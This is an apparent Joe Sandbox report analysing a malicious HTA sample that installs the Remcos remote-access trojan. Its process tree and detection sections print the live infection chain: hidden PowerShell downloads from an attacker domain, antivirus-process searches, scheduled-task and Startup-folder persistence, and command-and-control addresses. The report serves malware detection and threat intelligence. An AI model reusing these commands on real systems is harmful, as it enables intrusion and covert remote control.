Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:c2.hta
Analysis ID:1585493
MD5:3a4f0963b57121e55af053325ea89240
SHA1:989889d50c78bff05ec5ed3e069bf72e58889c35
SHA256:41d88bc4022af4df4b7be44f3de7ff07e5619b2116400eb57460367b85958684
Tags:htauser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6164 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 1148 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7196 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • Acrobat.exe (PID: 7404 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7684 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7840 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2044 --field-trial-handle=1728,i,16385498434607258670,18278990784431365219,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • powershell.exe (PID: 7420 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 8572 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • msword.exe (PID: 8720 cmdline: msword.exe MD5: 5BF20E8953B3219CD4F60BE10A73509F)
        • cmd.exe (PID: 8908 cmdline: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 8980 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 8996 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 9024 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 9032 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 9136 cmdline: cmd /c md 361684 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • extrac32.exe (PID: 9152 cmdline: extrac32 /Y /E Approaches MD5: 9472AAB6390E4F1431BAA912FCFF9707)
          • findstr.exe (PID: 9168 cmdline: findstr /V "Korea" Measurement MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 9184 cmdline: cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 9200 cmdline: cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Propose.com (PID: 5752 cmdline: Propose.com U MD5: 62D09F076E6E0240548C2F837536A46A)
            • cmd.exe (PID: 7220 cmdline: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 648 cmdline: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 7552 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • choice.exe (PID: 600 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • cmd.exe (PID: 8748 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8808 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 8388 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 8500 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 6064 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 8556 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Legitimate Application Dropped Script
    Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 6164, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0o8vth[1].bat
    Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7220, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 648, ProcessName: schtasks.exe
    Sigma detected: Suspicious Invoke-WebRequest Execution
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7420, ProcessName: powershell.exe
    Sigma detected: Suspicious MSHTA Child Process
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6164, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ProcessId: 1148, ProcessName: cmd.exe
    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7420, ProcessName: powershell.exe
    Sigma detected: WScript or CScript Dropper
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 8388, ProcessName: wscript.exe
    Sigma detected: PowerShell Web Download
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7196, ProcessName: powershell.exe
    Sigma detected: Suspicious Schtasks From Env Var Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7220, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 648, ProcessName: schtasks.exe
    Sigma detected: Usage Of Web Request Commands And Cmdlets
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7196, ProcessName: powershell.exe
    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 8388, ProcessName: wscript.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7196, ProcessName: powershell.exe

    Data Obfuscation

    barindex
    Sigma detected: Drops script at startup location
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7552, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Sigma detected: Search for Antivirus process
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8908, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 9032, ProcessName: findstr.exe

    Stealing of Sensitive Information

    barindex
    Sigma detected: Remcos
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com, ProcessId: 5752, TargetFilename: C:\ProgramData\remcos\logs.dat

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T18:13:55.311475+010020365941Malware Command and Control Activity Detected192.168.2.449756193.26.115.397009TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T18:13:56.432073+010028033043Unknown Traffic192.168.2.449758178.237.33.5080TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T18:12:57.345392+010028275781A Network Trojan was detected192.168.2.449731108.181.20.35443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T18:13:00.400496+010018100002Potentially Bad Traffic192.168.2.449735193.26.115.39443TCP
    2025-01-07T18:13:04.344206+010018100002Potentially Bad Traffic192.168.2.449738193.26.115.39443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://myguyapp.com/msword.zip.Avira URL Cloud: Label: malware
    Yara detected Remcos RAT
    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
    Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004062D5 FindFirstFileW,FindClose,13_2_004062D5
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_00402E18 FindFirstFileW,13_2_00402E18
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00406C9B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CEA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA087
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CEA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA1E2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,38_2_00CDE472
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CEA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00CEA570
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE66DC FindFirstFileW,FindNextFileW,FindClose,38_2_00CE66DC
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CAC622 FindFirstFileExW,38_2_00CAC622
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,38_2_00CE73D4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CE7333 FindFirstFileW,FindClose,38_2_00CE7333
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDD921
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00CDDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDDC54
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49756 -> 193.26.115.39:7009
    Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49731 -> 108.181.20.35:443
    Source: global trafficTCP traffic: 192.168.2.4:49756 -> 193.26.115.39:7009
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
